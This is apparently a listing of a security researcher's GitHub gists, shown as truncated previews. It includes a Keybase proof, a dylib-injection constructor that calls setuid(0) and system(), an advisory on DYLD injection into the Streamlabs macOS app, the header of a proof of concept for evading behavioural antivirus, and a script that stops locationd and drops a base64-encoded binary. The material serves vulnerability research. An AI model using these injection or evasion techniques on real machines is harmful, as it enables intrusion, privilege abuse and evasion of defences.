I hereby claim:
- I am theevilbit on github.
- I am theevilbit (https://keybase.io/theevilbit) on keybase.
- I have a public key whose fingerprint is F499 3DB9 AD64 BB7B 273C 2A41 A833 5B8E 6ACF DB3C
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
#include <stdio.h> | |
#include <syslog.h> | |
#include <stdlib.h> | |
__attribute__((constructor)) | |
static void customConstructor(int argc, const char **argv) | |
{ | |
setuid(0); | |
system("id"); | |
printf("Hello from dylib!\n"); |
The Streamlabs macOS thick client does have hardened runtime enabled, but specifically allows DYLD environment variables and also disables library validation, which kills the purpose of hardened runtime. Having these settings on the executable enables an attacker to inject custom DYLIB libraries into the application. This would allow an attacker to access data inside the app, and possibly gain persistence on a machine, beyond that, as StreamLabs has access to the microphone and camera a user would gain access to that once exploited.
We can see the wrong permissions with running the codesign
utility:
csaby@bigsur ~ % codesign -dv --entitlements :- /Applications/Streamlabs\ OBS.app
Executable=/Applications/Streamlabs OBS.app/Contents/MacOS/Streamlabs OBS
Identifier=com.streamlabs.slobs
Format=app bundle with Mach-O thin (x86_64)
wget --no-check-certificate --recursive --domains=opensource.apple.com --no-clobber --accept "*.gz" --no-parent -l2 https://opensource.apple.com/tarballs | |
wget --no-check-certificate --recursive --domains=opensource.apple.com --no-clobber --accept "*.gz" -l2 https://opensource.apple.com/ | |
wget --no-check-certificate --recursive --domains=opensource.apple.com --no-clobber --accept "*.gz" --no-parent -l3 https://opensource.apple.com/darwinbuild/ |
/* | |
This is a POC for a generic technique I called internally on our red team assessment "Divide and Conquer", which can be used to bypass behavioral based NextGen AV detection. It works by splitting malicious actions and API calls into distinct processes. | |
*/ | |
#include <stdio.h> | |
#include <tchar.h> | |
#include <windows.h> | |
#include "Commctrl.h" | |
#include <string> |
/* | |
Compile: | |
gcc -framework Foundation -framework AppKit screenshot.m -o screenshot | |
*/ | |
#import <Foundation/Foundation.h> | |
#import <AppKit/AppKit.h> | |
int main(void) { |
#!/bin/zsh | |
: ' | |
You need a personal access token for GitHub to avoid hitting the rate limit. Refer to the docs: | |
https://docs.github.com/en/rest/guides/getting-started-with-the-rest-api | |
https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/creating-a-personal-access-token | |
' | |
APPLE_OSS_DIR="all_apple_oss_archives" | |
APPLE_OSS_REPO_FILE="all_apple_oss_repo_names.txt" |
https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-178 | |
https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-176.100.1 | |
https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-176 | |
https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-174.0.1 | |
https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-172 | |
https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-168 | |
https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-163 | |
https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-158 | |
https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-153 | |
https://api.github.com/repos/apple-oss-distributions/adv_cmds/tarball/refs/tags/adv_cmds-149 |
#!/bin/zsh | |
echo "++ Stopping locationd" | |
sudo launchctl stop com.apple.locationd | |
echo "++ Dropping swiftliverpool" | |
echo z/rt/gcAAAEDAAAAAgAAAB4AAACwDQAAhQAgAAAAAAAZAAAASAAAAF9fUEFHRVpFUk8AAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAAAA+AQAAF9fVEVYVAAAAAAAAAAAAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAUAAAAFAAAADwAAAAAAAABfX3RleHQAAAAAAAAAAAAAX19URVhUAAAAAAAAAAAAALAtAAABAAAAa0AAAAAAAACwLQAABAAAAAAAAAAAAAAAAAQAgAAAAAAAAAAAAAAAAF9fc3R1YnMAAAAAAAAAAABfX1RFWFQAAAAAAAAAAAAAHG4AAAEAAACiAAAAAAAAABxuAAABAAAAAAAAAAAAAAAIBACAAAAAAAYAAAAAAAAAX19zdHViX2hlbHBlcgAAAF9fVEVYVAAAAAAAAAAAAADAbgAAAQAAAB4BAAAAAAAAwG4AAAIAAAAAAAAAAAAAAAAEAIAAAAAAAAAAAAAAAABfX2NvbnN0AAAAAAAAAAAAX19URVhUAAAAAAAAAAAAAOBvAAABAAAALgEAAAAAAADgbwAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF9fc3dpZnQ1X3R5cGVyZWZfX1RFWFQAAAAAAAAAAAAADnEAAAEAAAAkAAAAAAAAAA5xAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX19vYmpjX21ldGhuYW1lAF9fVEVYVAAAAAAAAAAAAAAycQAAAQAAACwBAAAAAAAAMnEAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAABfX2NzdHJpbmcAAAAAAAAAX19UR |